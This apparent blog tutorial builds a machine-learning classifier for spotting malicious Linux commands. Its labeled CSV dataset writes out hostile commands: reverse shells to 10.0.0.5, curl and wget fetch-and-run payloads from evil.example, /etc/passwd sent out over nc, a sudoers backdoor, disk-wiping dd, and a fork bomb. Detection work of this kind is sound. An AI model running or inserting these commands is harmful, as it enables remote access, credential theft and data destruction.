AI For Security Series: (Snapshot 1) A developer published a proof-of-concept showing how a machine-learning classifier can flag malicious Linux commands that rule-based detection would miss. The project uses scikit-learn's TfidfVectorizer to convert commands into weighted token features and a RandomForestClassifier trained on a small labeled dataset of benign commands like 'ls -la' and malicious ones such as 'nc -e /bin/sh 10.0.0.5 4444'. The author notes the approach generalizes to unseen commands, unlike an if-then rule set, and that swapping models requires changing only the classifier line. AI for Security Series 1 : AI CHANGED the way we work and the way we program, I am trying to push some series on AI For Security. Which is how we use AI to build better security . These series are proof of concept, but they are powerful basics. One can build on it and improve. Let's build a very simple proof of concept for a small security project to find if the linux command is malicious or benign non malicious or safe . For example, commands like rm -rf are considered more malicious than an ls command. Normal Programming: One would think use the rule-based approach IF-Then : python def detect command cmd : if "rm -rf" in cmd or "/etc/passwd" in cmd: return "malicious" return "benign" Machine Learning I was trying to build a small proof of concept on finding if the command is malicious on python. The idea is that it can catch a command that it never saw it before. The code in machine learning would look like this: The mind-map: First install scikit learn pip install scikit-learn python from sklearn.feature extraction.text import TfidfVectorizer from sklearn.ensemble import RandomForestClassifier import pandas as pd df = pd.read csv "dataset.csv" vectorizer = TfidfVectorizer X = vectorizer.fit transform df 'command' y = df 'label' clf = RandomForestClassifier clf.fit X, y def detect command cmd : v = vectorizer.transform cmd return clf.predict v 0 print detect command "ls -la" print detect command "nc -e /bin/sh 10.0.0.5 4444" You would need the dataset: Feel free to build yours but here is my full dataset: command,label ls -la,benign cd /home/user/projects,benign cat notes.txt,benign pwd,benign mkdir backup,benign cp report.pdf /home/user/docs/,benign git status,benign git pull origin main,benign python3 app.py,benign pip install requests,benign top,benign df -h,benign grep error /var/log/app.log,benign tail -f /var/log/syslog,benign ssh user@server.example.com,benign sudo apt update,benign nano config.yaml,benign tar -czf backup.tar.gz projects/,benign ping -c 4 8.8.8.8,benign whoami,benign curl https://api.example.com/status,benign docker ps,benign echo hello world,benign "find . -name "" .py""",benign chmod 644 index.html,benign bash -i & /dev/tcp/10.0.0.5/4444 0 &1,malicious nc -e /bin/sh 10.0.0.5 4444,malicious curl http://evil.example/x.sh | sh,malicious wget http://evil.example/m -O /tmp/m; chmod +x /tmp/m; /tmp/m,malicious rm -rf / --no-preserve-root,malicious cat /etc/shadow,malicious cat /etc/passwd | nc 10.0.0.5 9001,malicious echo ZWNobyBoaQ== | base64 -d | bash,malicious history -c && rm ~/.bash history,malicious chmod 777 /etc/passwd,malicious " crontab -l; echo "" /tmp/m"" | crontab -",malicious "python3 -c 'import socket,os,pty;s=socket.socket ;s.connect ""10.0.0.5"",4444 ;pty.spawn ""sh"" '",malicious dd if=/dev/zero of=/dev/sda,malicious mkfifo /tmp/f; cat /tmp/f | sh -i 2 &1 | nc 10.0.0.5 4444 /tmp/f,malicious curl -s http://evil.example/p.py | python3,malicious "echo ""attacker ALL= ALL NOPASSWD:ALL"" /etc/sudoers",malicious useradd -o -u 0 backdoor,malicious iptables -F,malicious wget -qO- http://evil.example/miner | bash,malicious : { :|:& };:,malicious Some notes on the commands: 1- TF-IDF: We applied that in the code in this line vectorizer = TfidfVectorizer TF Term Frequency : how often the word appears in this command. More often means more important to that command. IDF Inverse Document Frequency : how rare the word is across all commands. cat shows up in 2 of 3 commands, so it's common and tells you little, and its score goes down. passwd shows up in only 1, so it's rare and distinctive, and its score goes up. 2- Random Forest Prediction Model / this is a supervised learning. check this line of code: clf = RandomForestClassifier 3- Look at the code again: fit to train, predict to answer. So switching models means changing only the line that creates clf. In conclusion, this is a proof of concept where you can use a model to provide prediction for security. For testing purpsoses you can try to choose different models other than random forest. In this example, we trained on all but the practice is to .fit on 80% of the dataset. Never grade the model on the same data you trained it on.